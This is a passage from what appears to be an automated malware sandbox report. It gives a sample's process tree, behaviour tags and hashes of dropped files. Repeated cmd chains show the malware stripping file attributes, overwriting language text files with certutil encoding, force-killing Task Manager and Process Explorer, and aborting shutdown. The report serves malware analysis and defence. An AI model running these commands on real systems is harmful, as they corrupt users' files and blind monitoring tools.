C:\Windows\system32\certutil.execertutil -encode -f "et.txt" "et.txt".148495⤵PID:868
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:660
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1596
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "eu.txt" "eu.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1680
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1848
-
-
C:\Windows\system32\certutil.execertutil -encode -f "eu.txt" "eu.txt".148495⤵PID:1736
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1684
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1068
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ext.txt" "ext.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1520
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:680
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ext.txt" "ext.txt".148495⤵PID:1244
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1792
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1672
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "fa.txt" "fa.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1696
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1252
-
-
C:\Windows\system32\certutil.execertutil -encode -f "fa.txt" "fa.txt".148495⤵PID:764
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
PID:1776
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1316
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "fi.txt" "fi.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1420
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
PID:1352
-
-
C:\Windows\system32\certutil.execertutil -encode -f "fi.txt" "fi.txt".148495⤵PID:944
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:424
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1716
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "fr.txt" "fr.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1688
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1488
-
-
C:\Windows\system32\certutil.execertutil -encode -f "fr.txt" "fr.txt".148495⤵PID:900
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:520
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:324
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "fur.txt" "fur.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1880
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
PID:1816
-
-
C:\Windows\system32\certutil.execertutil -encode -f "fur.txt" "fur.txt".148495⤵PID:744
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:436
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1892
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "fy.txt" "fy.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1812
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
- Views/modifies file attributes
PID:1204
-
-
C:\Windows\system32\certutil.execertutil -encode -f "fy.txt" "fy.txt".148495⤵PID:1988
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1692
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:912
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ga.txt" "ga.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:788
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
- Views/modifies file attributes
PID:1596
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ga.txt" "ga.txt".148495⤵PID:1624
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1468
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1760
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "gl.txt" "gl.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1428
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1068
-
-
C:\Windows\system32\certutil.execertutil -encode -f "gl.txt" "gl.txt".148495⤵PID:1680
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1548
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1296
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "gu.txt" "gu.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:304
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Views/modifies file attributes
PID:1672
-
-
C:\Windows\system32\certutil.execertutil -encode -f "gu.txt" "gu.txt".148495⤵PID:1520
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1920
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:656
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "he.txt" "he.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:2036
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
PID:1316
-
-
C:\Windows\system32\certutil.execertutil -encode -f "he.txt" "he.txt".148495⤵PID:1696
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:648
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1900
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "hi.txt" "hi.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1016
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
PID:1716
-
-
C:\Windows\system32\certutil.execertutil -encode -f "hi.txt" "hi.txt".148495⤵PID:1420
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1748
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1756
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "hr.txt" "hr.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1364
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:324
-
-
C:\Windows\system32\certutil.execertutil -encode -f "hr.txt" "hr.txt".148495⤵PID:1688
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1944
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1732
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "hu.txt" "hu.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1964
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
PID:1892
-
-
C:\Windows\system32\certutil.execertutil -encode -f "hu.txt" "hu.txt".148495⤵PID:1880
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1540
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1992
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "hy.txt" "hy.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1888
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:760
-
-
C:\Windows\system32\certutil.execertutil -encode -f "hy.txt" "hy.txt".148495⤵PID:940
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
PID:1560
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1464
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "id.txt" "id.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1684
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1336
-
-
C:\Windows\system32\certutil.execertutil -encode -f "id.txt" "id.txt".148495⤵PID:1440
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1960
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1476
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "io.txt" "io.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1908
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1452
-
-
C:\Windows\system32\certutil.execertutil -encode -f "io.txt" "io.txt".148495⤵PID:1712
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1512
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1628
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "is.txt" "is.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1776
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Views/modifies file attributes
PID:1564
-
-
C:\Windows\system32\certutil.execertutil -encode -f "is.txt" "is.txt".148495⤵PID:1940
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:556
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:636
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "it.txt" "it.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1192
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
PID:1932
-
-
C:\Windows\system32\certutil.execertutil -encode -f "it.txt" "it.txt".148495⤵PID:328
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1164
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1832
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ja.txt" "ja.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:520
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:572
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ja.txt" "ja.txt".148495⤵PID:1652
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:592
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:316
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ka.txt" "ka.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:436
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Views/modifies file attributes
PID:1648
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ka.txt" "ka.txt".148495⤵PID:1928
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1764
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1820
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "kaa.txt" "kaa.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:660
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1664
-
-
C:\Windows\system32\certutil.execertutil -encode -f "kaa.txt" "kaa.txt".148495⤵PID:1812
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
PID:1596
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1624
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "kab.txt" "kab.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1468
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:912
-
-
C:\Windows\system32\certutil.execertutil -encode -f "kab.txt" "kab.txt".148495⤵PID:788
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1068
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1680
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "kk.txt" "kk.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1792
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1760
-
-
C:\Windows\system32\certutil.execertutil -encode -f "kk.txt" "kk.txt".148495⤵PID:1428
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
PID:1672
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1520
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ko.txt" "ko.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1920
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
PID:1296
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ko.txt" "ko.txt".148495⤵PID:304
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1316
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1696
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ku-ckb.txt" "ku-ckb.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:648
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:656
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ku-ckb.txt" "ku-ckb.txt".148495⤵PID:2036
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1716
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1420
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ku.txt" "ku.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1748
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1900
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ku.txt" "ku.txt".148495⤵PID:1016
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:324
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1688
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ky.txt" "ky.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1576
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1756
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ky.txt" "ky.txt".148495⤵PID:1364
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1892
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1880
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "lij.txt" "lij.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1540
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1732
-
-
C:\Windows\system32\certutil.execertutil -encode -f "lij.txt" "lij.txt".148495⤵PID:1964
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:760
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:940
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "lt.txt" "lt.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1616
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1992
-
-
C:\Windows\system32\certutil.execertutil -encode -f "lt.txt" "lt.txt".148495⤵PID:1888
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1336
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1440
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "lv.txt" "lv.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1960
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
PID:1464
-
-
C:\Windows\system32\certutil.execertutil -encode -f "lv.txt" "lv.txt".148495⤵PID:1684
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1452
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1712
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "mk.txt" "mk.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1512
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1520
-
-
C:\Windows\system32\certutil.execertutil -encode -f "mk.txt" "mk.txt".148495⤵PID:1792
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1352
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1656
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "mn.txt" "mn.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:424
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1696
-
-
C:\Windows\system32\certutil.execertutil -encode -f "mn.txt" "mn.txt".148495⤵PID:1920
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1488
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:900
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "mng.txt" "mng.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1164
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1420
-
-
C:\Windows\system32\certutil.execertutil -encode -f "mng.txt" "mng.txt".148495⤵PID:648
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1816
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:744
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "mng2.txt" "mng2.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1944
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Views/modifies file attributes
PID:1688
-
-
C:\Windows\system32\certutil.execertutil -encode -f "mng2.txt" "mng2.txt".148495⤵PID:1748
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1204
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1388
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "mr.txt" "mr.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1692
-
-
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x58c1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1556
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
234B
MD596c9c6b406f135e671259162e3297a7f
SHA146afd118a72f0d6eff37df1cb5a2736bb09256d0
SHA2562334f05350be7eb42137eea6a49abb1fc501462c278a9c1af98a8d8da8042346
SHA5126b062840792daf34af7f5c384e83caefb206a897f9003856530adadd8fcb5b481e277af579a0609837d6c83bf6cf2935efe12be4f5aa5769e3b0162053c602a1
-
Filesize
31.3MB
MD5fb342ec1fae7d6514e35d4b5b3f9333f
SHA1f7d535ef092e58afa24d165ce8818c0efce55731
SHA256c6a8e925cf46ff4393b4fbd31e5ddb85008ed4a9748af97e8bb45bb9de837ec2
SHA5120a3379de21c15f4f16d605169e2124dc36f903fda505f35d7014a19664e1546b4b8130dffd29478166af4c0afc95f5ba64aba7233286270a1eef9250b2d34953
-
Filesize
4.0MB
MD52e750e1e62d50a22ca8b5d094b3a64b0
SHA18ed3d6ca08a07cca58dfceacf7bee6cb68f73cd1
SHA256f8bc9fcaccd9a0e402b77cf8e8022d29586953ffdbb58d94e4aca8594525b0ad
SHA5129dd7c8afc80d2059d6eca64df586bbfa138a8922d18997192f41588105a6e8c0afdeac9d7fae5e52c3305f3b242e86c5b03917ad03229a67eaa19056bba356e3
-
Filesize
6KB
MD5a5ff962fa610d9f78c3c9511d24f05e8
SHA19e9745ecfc1b82bc29f0a044385704b592724918
SHA25692ee9f0fdb128e2f9e6886ec0e5abd844e6027738d86d7222628e73342e8eb7a
SHA512081e86f6d4a2c9adcff01b03b899aaae4a9d860333ff49c086c4aef30b65542b2e24d193dd9879a2fc54552c42a4aab9f26bf76f45544e7e1f88dd17cfdc688c
-
Filesize
1.6MB
MD570a412c8ae4cd76591c3df39e2d131d4
SHA1bdbf27c22eb2d3bc72f1f87326200c5014ae8481
SHA256be06d41463c20fd56417b99e83e20c8456b1016981548f304ca7b13f4d56c2f3
SHA5126d66b2c1afcc073a343ff06cdccc4ea8c7b0ab36c02bb119ef5d3174835debbd582d008478a7d74f44c52607cce880d008c91a68c519358daeac79dc4ccdebd4
-
Filesize
32.5MB
MD577e8072b4982c4f95d6b1bbbbdb30a15
SHA18ae3d8d7e901d9bd834a8f337eb0004843cbf512
SHA256ee516b17ef3ade87b7806891718960883cafb54d41e44f2e5b365152024f0b46
SHA512fa9de093c1ac81129688591fbc5f8edd02021422f26e4e01516da635e11d8b2ef8e427fc16db01b6413d30616cb375f4b06103675bc85791866a2b40d8ca9002
-
Filesize
23KB
MD57465e39a3c01c5ce7d8a3cb3775d7622
SHA146fe5b354b7c14814784694187223fad6256510d
SHA2560516a04ac56586e0cc819b356e74a21c3d86d2fdc829d1a41623a9b0a8e3251c
SHA512d273b958c31f9b69176abbdf33fef6d65579600cb5ecdfe5cf0ed16cf1aa753d389de65cce06bda25dfa3a253de9c31fb89cc2bf0ef10e6021c0cdd9c785155d
-
Filesize
200KB
MD5380a16688c344bd310b9ff5ba90683a3
SHA19902e9fc77fdd48634cb236e036b6df578522211
SHA25689228484bfacc0a9d234d9395819501d1103f9535eb8b43758ae99b418bf02c2
SHA51263e2cc182e257ffc94bf241efd74cc4437f656b09cfa22c618fdbf92c6f7dfcf1be24748538855b86a80fbd844f74942de83a08016999d9b88d175980ea6e778
-
Filesize
7.6MB
MD5625eb70ab7a8acf35615edaf3b5e9cc6
SHA1ce3e9b52292992f083c65e3331c990f556e942c1
SHA256ff84b466bf66f849745839409b464e4b3a3ead1e60c8569d173283a6db6ea722
SHA5127eeddbdc64e13ff33dcc7018f54d118ea8d658742658642afdd64fbb021bb310b900a1820451c4906f31c60d40837881cb06e506b91d847d39aaae8392c9a0bb
-
Filesize
961KB
MD577e13dd3803036870ceed613a7e68358
SHA1a75b58812d52dd754325e2471a002e6db0d35d68
SHA256fe30373797fb88abad235e9e224a3799ec742e3fee84a2f5e27d4cb19a489008
SHA512a914f4aa24d9f279f6950e4d8d931291c121e33923dd6d012c2390e13612f5538ed0ffeed17d894fd5864a80a074276778e26042e09b9c7925b0e84f3cf3c057
-
Filesize
1.4MB
MD584e097185a69941e011e3af8f7465e8e
SHA1be0c0e52c005c335e1136de8bf433d4655601d73
SHA256a3df67b25fc8b89740c9ed1a685ddc95f238d3b980fd6e9339a45493dc5f2f59
SHA51283fc6f4c1dc333bc60089d7bafb9c9b684cc1b10c22f4ca4af13c2f254680c4248d39ed41110d68169d8c8f6c0d3a6ce31b71f256ab534fc8fca2ad0086cc019
-
Filesize
22.1MB
MD520bd06938e0ba36467d4b36b6dd83082
SHA13137fdc1f2e14357b21a5fd59bddf7443bd4c855
SHA2569fad2a010ada5f3da25f85a5e6258b39dea21ae482a6752c73b074d52a4439d6
SHA512f0dc08ac574b1e88c0501c39a516ba30ca3a03ce4bf55817c6430725f2110068aefd9db2b7b84f873479c4b9fc39b3d6d3d4be746df241a42207828fe0c8b964
-
Filesize
2.4MB
MD5e1abf65fc22288a1ecb24df9735f79e7
SHA178fdde9270acfb06d3d1d7fda6a524c882ccd01b
SHA256fb85a666a6393fc47f2cad29e8763febf8867b619cf8792c1716be9368b41a6a
SHA512be88d0bef554f4913427c14c16275f1985f769f9df901fd3ce30765076a4a2723eeeb85ff6a50fb3b69bf04e7f5fe082a7b9f00d749882943be40367c1393956
-
Filesize
2KB
MD5ac342e8059cc0738e20350aa88788199
